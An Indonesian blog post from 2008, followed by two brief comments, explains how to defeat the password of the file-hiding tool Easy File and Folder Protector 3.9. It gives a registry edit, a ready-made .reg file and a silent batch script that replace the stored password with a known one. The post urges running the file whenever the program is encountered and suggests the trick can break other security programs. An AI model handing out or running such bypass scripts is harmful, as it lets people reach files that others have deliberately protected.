Rabu, 07 Mei 2008

Membuka file konfigurasi program Easy File and Folder Protector.

Easy File and Folder Protector adalah program untuk memproteksi file dan folder yang dibuat oleh perusahaan yang sama dengan program Easy File Protector. Easy File and Folder Protector bisa anda cari di http://www.softstack.com. Tampilannya identik dengan Easy File Protector. Folder yang diproteksi dengan program ini akan hilang dari pandangan mata. Bila anda lupa password program ini atau anda ingin membuka program ini yang terpassword, maka caranya kurang lebih sama dengan saat anda membuka password Easy File Protector.


Buka Regedit. Masuk bagian : HKEY_LOCAL_MACHINE\SOFTWARE\Easy File & Folder Protector. Cari value bernama : 281744411f94b2aa. Hapus isinya. Anda akan diijinkan masuk ke dalam program konfigurasi tanpa password.


Trick ini dicoba dengan Easy File and Folder Protector versi : 3.9 . Anda bisa melihat bahwa kadangkala meskipun sudah berganti versi atau berganti program, tetapi software dari perusahaan yang sama seringkali memiliki cara penyimpanan password yang serupa. Sehingga kemungkinan besar meskipun anda memakai versi program yang lain, anda masih bisa memakai trick ini.


Bila anda ingin membuat script untuk membuka password Easy File and Folder Protector, caranya sangat mudah. Hapus dulu isi dari 281744411f94b2aa atau biarkan file itu terisi dengan password anda sendiri, lalu ekspor registry pada bagian tersebut dengan file berekstensi reg. Edit dengan Notepad bagian yang tidak diperlukan sehingga cuma 281744411f94b2aa saja yang masih ada. Simpan dengan nama bobol.reg.


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Easy File & Folder Protector]

"281744411f94b2aa"=""


Kapanpun anda menjumpai program Easy File and Folder Protector anda tinggal menjalankan file reg tersebut. Bila isi dari 281744411f94b2aa anda hapus maka anda tidak perlu memasukkan password tetapi bila isi dari 281744411f94b2aa adalah password anda sendiri , maka anda tinggal masukkan password milik anda. Cara ini bisa anda terapkan untuk membuat file reg untuk menembus proteksi program security yang lain.


Karena pada pembahasan sebelumnya kita baru saja membuat script vbs, maka kali ini kita ingin mencoba membuat script bat. Untuk mengubah file reg menjadi script bat biasanya tidak ada masalah karena kita tinggal menambah Echo di depan setiap kalimat. Tetapi kali ini kita mendapatkan sedikit masalah kecil karena adanya simbol "&" pada kata Easy File & Folder Protector. Ini akan menciptakan error pada script bat buatan kita. Untuk mengatasinya tambahkan tanda "^"(tanpa tanda petik) sebelum simbol &. Scriptnya kurang lebih seperti ini :


@echo off

echo Anda memilih masuk file konfigurasi Easy File ^& Folder Protector

echo.

echo Windows Registry Editor Version 5.00 > %Temp%\bobol.reg


echo [HKEY_LOCAL_MACHINE\SOFTWARE\Easy File ^& Folder Protector]>> %Temp%\bobol.reg

echo "281744411f94b2aa"="3118535d069eb3a78fdbaa8fa2a5">> %Temp%\bobol.reg


REGEDIT /S "%temp%\bobol.reg"

del %Temp%\bobol.reg

echo.

echo Untuk masuk ke file konfigurasi, Masukkan Password : Indonesia Jaya

echo.

Pause

exit



Pada contoh di atas, password sengaja tidak dikosongkan tetapi diisi password kita sendiri yaitu Indonesia Jaya. Salam.


2 komentar:








Anonim

mengatakan...

GOOD ....





Anonim

mengatakan...

MAkasih atas tambahan informasinya

salam kenal oz

http://oz.orgfree.com




Posting Komentar

Terimakasih telah Berkunjung ....Ditunggu Komentarnya Lho....Silahken Silahken.... ^_^